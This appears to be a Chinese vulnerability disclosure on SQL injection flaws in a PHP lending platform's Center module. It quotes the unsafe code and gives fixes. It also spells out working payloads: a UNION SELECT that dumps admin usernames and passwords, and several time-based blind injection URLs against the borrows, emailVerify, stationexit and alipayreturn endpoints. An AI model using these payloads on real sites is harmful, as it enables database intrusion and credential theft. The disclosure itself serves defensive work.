http://localhost/Center/invest/?mid=plan&bid=1) UNION SELECT 1,concat(username,0x2c,password),3,4,5,6,7,8 from ds_admin%23
这里还有一处SQL盲注:在下面这段代码里,$id 没有做类型转换或过滤,就直接拼接进了 where 条件字符串。
public function borrows($id){
    $borrowing = M("borrowing");
    return $borrowing->where('id='.$id)->field('id,title,rates,deadline,money,state')->find();
}
修复建议:id 应为整数,拼接前先做强制类型转换(如 intval($id)),或改用参数绑定的查询方式,不要把请求参数直接拼进 SQL 条件。
payload: http://localhost/Center/borrows/?id=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23
再来一处sql盲注:
payload: http://localhost/Center/emailVerify/ post:email=test') AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23
再来一处sql盲注:
payload: http://localhost/Center/stationexit/test) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
最后两处SQL注入(代码节选,函数后半部分未贴出):
public function alipayreturn(){
    $msgTools = A('msg','Event');
    header("Content-Type:text/html; charset=utf-8");
    vendor('Alipay.Notify');
    $online=M('online');
    $list=$online->where('`id`=1')->find();
    $alipay_config['partner'] = $list['pid'];
    $alipay_config['key'] = $list['checking'];
    $alipay_config['sign_type'] = strtoupper('MD5');//签名方式 不需修改
    $alipay_config['input_charset']= strtolower('utf-8');//字符编码格式 目前支持 gbk 或 utf-8
    $alipay_config['transport'] = 'http';//访问模式,根据自己的服务器是否支持ssl访问,若支持请选择https;若不支持请选择http
    $alipayNotify = new AlipayNotify($alipay_config);
    $verify_result = $alipayNotify->verifyReturn();
    //获取充值
    $recharge=M('recharge');
    $rechar=$recharge->where('nid='.$this->_get('out_trade_no'))->find();
    if($verify_result) {//验证成功
        //mark
        $recharge->where('nid='.$this->_get('out_trade_no'))->save(array('type'=>2,'audittime'=>time(),'date'=>json_encode($_GET),'handlers'=>'第三方支付'));
        //mark
这里应该是有两处SQL盲注的,一处是select的,一处是update的。两处都是把请求参数 out_trade_no 直接拼接进 where 条件;其中 select 查询写在 if($verify_result) 判断之前,所以验签未通过的请求同样会执行这条查询,update 则只在验签通过后才执行。
修复建议:先完成验签,验签通过后再访问数据库;同时对 out_trade_no 做严格的格式校验,或使用参数绑定,不要直接拼接进条件字符串。
http://localhost/Center/alipayreturn/?out_trade_no=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--